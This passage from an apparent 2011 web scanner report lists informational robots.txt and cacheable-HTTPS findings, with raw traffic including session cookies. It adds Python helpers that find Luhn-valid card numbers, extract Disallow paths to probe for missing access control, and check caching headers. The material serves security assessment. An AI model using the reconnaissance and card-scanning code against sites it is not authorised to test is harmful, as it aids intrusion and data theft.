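    if n == 15 and two in (34, 37):
        return "American Express"
    if n == 16 and (four == 6011 or two == 65):
        return "Discover"
    return None


def find_card_candidates(text: str, context: int = 40) -> list:
    """Every Luhn-valid digit run in text, with an issuer guess and surrounding characters for triage."""
    hits = []
    for m in CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if not 13 <= len(digits) <= 19 or not luhn_ok(digits):
            continue
        hits.append({
            "number": digits,
            "brand": brand_guess(digits),
            "context": text[max(0, m.start() - context):m.end() + context],
        })
    return hits


if __name__ == "__main__":
    for hit in find_card_candidates(SAMPLE_RESPONSE):
        print(hit["number"], hit["brand"] or "no known issuer range", "|", hit["context"].strip())
```

All six runs above pass Luhn (a 16-digit string does so one time in ten), and one of them, 5278640205054957, even falls in an issuer range, which is why a checksum alone cannot settle the question. The context field shows that each run is a thumbnail filename inside a src attribute, so the finding is informational here; the same scan over a checkout or account page would deserve a different answer.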

22. Robots.txt file
There are 21 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
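
Turning the advice above into a check: the script below is an added example, not part of the report, that parses a robots.txt body into per-agent rule groups and lists the Disallow paths worth testing for missing access control. It skips the entries that carry no information: an empty Disallow (nothing withheld), a blanket Disallow: / (everything withheld, nothing specific revealed) and the non-standard Disallow: * that l.addthiscdn.com returns below. The sample bodies are copied from the static.nme.com and ad-apac.doubleclick.net responses in this section; the viagogo one is reduced to the lines shown in 22.7.

```python
from dataclasses import dataclass, field

# Constructed samples, copied from robots.txt bodies shown in this section.
NME_ROBOTS = """\
# robots.txt for http://www.nme.com/

sitemap: http://www.nme.com/sitemap-index.xml

User-agent: *
Crawl-Delay: 10
Disallow: /Design
Disallow: /design
Disallow: /directory
Disallow: /logout
"""

DOUBLECLICK_ROBOTS = """\
User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
"""

VIAGOGO_ROBOTS = """\
# Viagogo Robots.txt Last Updated: 25/10/2010

User-agent: *
Disallow: /secure/
Disallow: /Secure/
Disallow: /fi/secure/
"""


@dataclass
class Robots:
    groups: dict = field(default_factory=dict)   # user-agent -> [(directive, value), ...]
    sitemaps: list = field(default_factory=list)


def parse_robots(body: str) -> Robots:
    """Minimal robots.txt parser: comments stripped, rules attached to the User-agent lines that precede them."""
    robots = Robots()
    agents = []          # agents the current group applies to
    in_rules = False     # True once a rule line has followed this group's User-agent lines
    for raw in body.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            if in_rules:                 # a User-agent line after rules starts a new group
                agents, in_rules = [], False
            agents.append(value)
            robots.groups.setdefault(value, [])
        elif key == "sitemap":           # sitemap lines are global, not per group
            robots.sitemaps.append(value)
        elif key in ("allow", "disallow", "crawl-delay"):
            in_rules = True
            for agent in agents:
                robots.groups[agent].append((key, value))
    return robots


def probe_targets(robots: Robots) -> dict:
    """Disallow paths that name a specific location, mapped to the agents they were hidden from."""
    targets = {}
    for agent, rules in robots.groups.items():
        for key, value in rules:
            if key == "disallow" and value not in ("", "/", "*"):
                targets.setdefault(value, []).append(agent)
    return targets


if __name__ == "__main__":
    for body in (NME_ROBOTS, DOUBLECLICK_ROBOTS, VIAGOGO_ROBOTS):
        robots = parse_robots(body)
        print("sitemaps:", robots.sitemaps)
        print("probe:", probe_targets(robots) or "nothing specific disclosed")
```

The paths this returns (for example /logout on static.nme.com or /secure/ on edge.viagogo.co.uk) are the ones to request directly, with and without a session, to confirm that the application enforces access control rather than relying on the file. Sitemap lines are collected separately because a sitemap enumerates content the site wants indexed and is usually a richer map than the Disallow list.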


22.1. http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /adj/onl.vine/music/blogs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad-apac.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 09 May 2011 14:01:16 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

22.2. http://ad.au.doubleclick.net/ad/N799.WhistleOut/B5381461.80

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /ad/N799.WhistleOut/B5381461.80

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.au.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 09 May 2011 14:02:49 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

22.3. http://adserver.adtech.de/addyn%7C3.0%7C656%7C1497495%7C0%7C170%7CADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C656%7C1497495%7C0%7C170%7CADTECH

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adserver.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

22.4. http://adserverams.adtech.de/adperf%7C2.0%7C577%7C2951881%7C0%7C1%7CAdId=5763683

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserverams.adtech.de
Path:   /adperf%7C2.0%7C577%7C2951881%7C0%7C1%7CAdId=5763683

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adserverams.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

22.5. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alvenda.122.2o7.net
Path:   /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: alvenda.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:53 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "245ff1-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www17
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.6. http://cspix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1268078506000"
Last-Modified: Mon, 08 Mar 2010 20:01:46 GMT
Content-Type: text/plain
Content-Length: 36
Date: Mon, 09 May 2011 14:05:47 GMT
Connection: close

# go away
User-agent: *
Disallow: /

22.7. http://edge.viagogo.co.uk/feeds/widget.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.viagogo.co.uk
Path:   /feeds/widget.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: edge.viagogo.co.uk

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: public
Content-Type: text/plain; charset=utf-8
Date: Mon, 09 May 2011 14:01:16 GMT
Last-Modified: Thu, 05 May 2011 14:46:46 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-AspNet-Version: 4.0.30319
X-Cache: HIT
X-Powered-By: ASP.NET
Content-Length: 3053
Connection: close

# Viagogo Robots.txt Last Updated: 25/10/2010

User-agent: *
Disallow: /secure/
Disallow: /Secure/
Disallow: /fi/secure/
Disallow: /fi/Secure/
Disallow: /no/secure/
Disallow: /no/Secure/
Dis
...[SNIP]...

22.8. http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f2nthevine.112.2o7.net
Path:   /b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: f2nthevine.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:59 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "305159-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www46
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.9. http://ie-stat.bmmetrix.com/V13a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ie-stat.bmmetrix.com
Path:   /V13a

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ie-stat.bmmetrix.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:51 GMT
Server: Apache/2
Last-Modified: Fri, 06 Feb 2009 03:21:20 GMT
ETag: "1deab-30-4623783c08c00"
Accept-Ranges: bytes
Content-Length: 48
Connection: close
Content-Type: text/plain

# Exclude all robots
User-agent: *
Disallow: /


22.10. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

22.11. http://ipcmedia.122.2o7.net/b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipcmedia.122.2o7.net
Path:   /b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ipcmedia.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:02 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "31dddd-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www15
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.12. http://irishtimesgroup.112.2o7.net/b/ss/itgirishtimesprod/1/H.15.1/s81982920831069

Summary

Severity:   Information
Confidence:   Certain
Host:   http://irishtimesgroup.112.2o7.net
Path:   /b/ss/itgirishtimesprod/1/H.15.1/s81982920831069

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: irishtimesgroup.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:12 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "1b5154-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www72
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.13. http://l.addthiscdn.com/live/t00/250lo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 07 Apr 2011 11:47:15 GMT
ETag: "de0256-1b-4a052abaf56c0"
Content-Type: text/plain; charset=UTF-8
Date: Mon, 09 May 2011 14:04:22 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


22.14. http://l.alvenda.net/e

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.alvenda.net
Path:   /e

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.alvenda.net

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 83
Last-Modified: Tue, 22 Mar 2011 15:28:56 GMT
Server: Jetty(6.1.22)

# mail admin@alvenda.net for constructive criticism

User-agent: *
Disallow: /

22.15. http://p.addthis.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.addthis.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: p.addthis.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:06:01 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.16. http://s0.2mdn.net/dot.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /dot.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 08 May 2011 20:35:09 GMT
Expires: Thu, 05 May 2011 20:30:09 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Age: 62755
Cache-Control: public, max-age=86400

User-agent: *
Disallow: /

22.17. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.nme.com
Path:   /themes/default/static_images//themes/default/images/footer_bkgrd.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.nme.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 21 Apr 2011 13:50:45 GMT
ETag: "418144-262-4a16e07223740"
Accept-Ranges: bytes
Content-Length: 610
Content-Type: text/plain
Cache-Control: max-age=1177933
Expires: Mon, 23 May 2011 05:14:31 GMT
Date: Mon, 09 May 2011 14:02:18 GMT
Connection: close

# robots.txt for http://www.nme.com/

sitemap: http://www.nme.com/sitemap-index.xml

User-agent: *
Crawl-Delay: 10
Disallow: /Design
Disallow: /design
Disallow: /directory
Disallow: /logout

...[SNIP]...

22.18. http://toolbarqueries.clients.google.com/tbproxy/af/query

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toolbarqueries.clients.google.com
Path:   /tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 14:06:56 GMT
Expires: Mon, 09 May 2011 14:06:56 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.19. http://va.px.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:06:29 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.20. http://west.thomson.com/VendorFeeds/Alvendify/AlvendaImpression.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /VendorFeeds/Alvendify/AlvendaImpression.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: west.thomson.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=259200
Content-Length: 1331
Content-Type: text/plain
Last-Modified: Thu, 28 Apr 2011 14:52:53 GMT
Accept-Ranges: bytes
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 14:06:54 GMT
Connection: close
Vary: Accept-Encoding

User-agent: *
Disallow: /organization/small-law-firms/resources/jurisdictions/massachusetts/
Disallow: /promotions/
Disallow: /products/affiliates/
Disallow: /products/law-students/test/
Disallow
...[SNIP]...

22.21. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thevine.com.au
Path:   /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thevine.com.au

Response

HTTP/1.1 200 OK
Content-Length: 107
Content-Type: text/plain
Content-Location: http://www.thevine.com.au/robots.txt
Last-Modified: Mon, 16 Aug 2010 22:55:26 GMT
Accept-Ranges: bytes
ETag: "083871d963dcb1:1a74"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 14:01:05 GMT
Connection: close

User-agent: *
Disallow:

# Include a Sitemap reference below
sitemap: http://thevine.com.au/sitemap.xml

23. Cacheable HTTPS response
There are 4 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:
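
As an added check (example code written for this page, not taken from the report or from the scanner): the functions below parse a raw response head and report which of the directives that suppress caching are absent. The two sample heads are copied from this section, the www.ccnow.com cart response in 23.1, which sends no caching directives at all, and the www.facebook.com likebox response earlier on the page, which sends Cache-Control: no-store, Pragma: no-cache and an Expires date in the past. The HARDENED head is the set I would send on every response carrying sensitive content; it is my recommendation, not text from the page.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Constructed samples: response heads copied from this section, bodies omitted.
CCNOW_CART = """\
HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:44 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950065; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:45 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15270
"""

FACEBOOK_LIKEBOX = """\
HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 09 May 2011 14:04:49 GMT
Content-Length: 18197
"""

# My recommended head for sensitive responses (an assumption of this example, not from the report).
HARDENED = """\
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Expires: 0
"""


def parse_head(raw: str) -> dict:
    """Header name (lower-cased) -> list of values; the status line is skipped, parsing stops at the blank line."""
    headers = {}
    for line in raw.splitlines()[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def cache_control_directives(headers: dict) -> set:
    """Directive names from every Cache-Control header, e.g. {'private', 'no-store'}; max-age=N becomes 'max-age'."""
    tokens = set()
    for value in headers.get("cache-control", []):
        for token in value.split(","):
            tokens.add(token.strip().split("=", 1)[0].lower())
    return tokens


def _http_date(value: str):
    """Aware datetime for an HTTP-date, or None when it does not parse (RFC 7234: treat as already expired)."""
    try:
        when = parsedate_to_datetime(value)
    except (TypeError, ValueError):
        return None
    if when is None:
        return None
    return when if when.tzinfo else when.replace(tzinfo=timezone.utc)


def cacheability_findings(headers: dict) -> list:
    """Reasons a browser or proxy may store this response; an empty list means caching is fully suppressed."""
    findings = []
    cc = cache_control_directives(headers)
    if "no-store" not in cc:
        findings.append("Cache-Control lacks no-store")
    if "no-cache" not in cc:
        findings.append("Cache-Control lacks no-cache")
    if "no-cache" not in {v.lower() for v in headers.get("pragma", [])}:
        findings.append("Pragma: no-cache absent (HTTP/1.0 caches ignore Cache-Control)")
    if "expires" not in headers:
        findings.append("Expires absent")
    else:
        when = _http_date(headers["expires"][0])
        # Expires is judged against the response's own Date header, falling back to the local clock.
        reference = _http_date(headers["date"][0]) if "date" in headers else None
        if when and when > (reference or datetime.now(timezone.utc)):
            findings.append("Expires is in the future")
    return findings


if __name__ == "__main__":
    for name, head in (("ccnow cart", CCNOW_CART), ("facebook likebox", FACEBOOK_LIKEBOX), ("hardened", HARDENED)):
        print(name, "->", cacheability_findings(parse_head(head)) or "not cacheable")
```

The check is purely header-based, so it says nothing about whether the body is worth protecting: instance 23.4 below is a favicon and carries nothing sensitive, whereas the cart and checkout responses in 23.1 to 23.3 hold order details and deserve the full header set.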


23.1. https://www.ccnow.com/cgi-local/cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/cart.cgi

Request

GET /cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/ HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949962

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:44 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950065; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:45 GMT
Set-Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75D81F41DED68942DF4467139B51A38206; domain=www.ccnow.com; path=/; expires=Wed, 08-May-2013 14:07:45 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...

23.2. https://www.ccnow.com/cgi-local/checkout.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/checkout.cgi

Request

POST /cgi-local/checkout.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/sc_cart.cgi
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oudelay=1304950012; __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.3.10.1304949980
Content-Length: 287

action=main&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=US&cids=asmakit&ftotal=1000%2C200%2C0%2C0&gtotal=1200&invoice=0&items=1&platflag=0&platform=Productio
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:52 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950072; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:52 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18997

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...

23.3. https://www.ccnow.com/cgi-local/sc_cart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/sc_cart.cgi

Request

POST /cgi-local/sc_cart.cgi HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/cart.cgi?asmakit_AKR214_http://asthmatickitty.com/
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949975; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.1.10.1304949980
Content-Length: 365

seq1_asmakit_pid=AKR214&seq1_asmakit_quan=1&coupon_asmakit=&shipreg_asmakit=BC%3AUS&action=update&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=ZZ&cids=asmakit
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:50 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950070; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:50 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...

23.4. https://www.ccnow.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949975; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.1.10.1304949980

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:47 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Last-Modified: Thu, 05 May 2011 18:01:55 GMT
ETag: "2fe-4dc2e613"
Accept-Ranges: bytes
Content-Length: 766
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/plain

